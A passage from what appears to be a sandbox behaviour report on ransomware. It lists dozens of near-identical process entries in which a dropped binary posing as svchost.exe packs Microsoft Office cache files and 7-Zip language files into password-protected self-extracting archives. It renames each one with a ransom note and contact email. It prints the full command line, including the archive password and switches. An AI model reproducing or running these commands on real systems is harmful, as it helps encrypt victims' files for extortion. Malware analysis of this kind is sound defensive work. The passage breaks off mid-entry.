  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\History.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\History.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\af.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\af.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\an.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\an.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ar.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ar.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ast.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ast.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\az.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\az.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ba.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ba.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\be.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\be.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bg.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bn.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\br.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ca.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ca.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\co.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\co.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cs.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cs.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cy.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1192
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\da.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\da.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\de.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\de.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\el.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\el.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eo.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\es.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\es.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\et.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\et.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Executes dropped EXE
  PID:916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eu.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ext.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ext.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fa.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fi.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fr.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fur.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fur.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fy.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ga.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ga.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3064
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gu.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\he.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\he.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hi.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hr.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hu.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hy.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\id.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\id.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\io.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\io.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\is.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\is.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\it.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\it.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2160
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ja.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ja.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ka.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ka.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kaa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kab.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kab.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kk.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ko.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ko.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ky.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ky.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lij.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lij.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lt.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1392
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lv.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mk.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:964
- C:\ProgramData\msvkp\svchost.exe
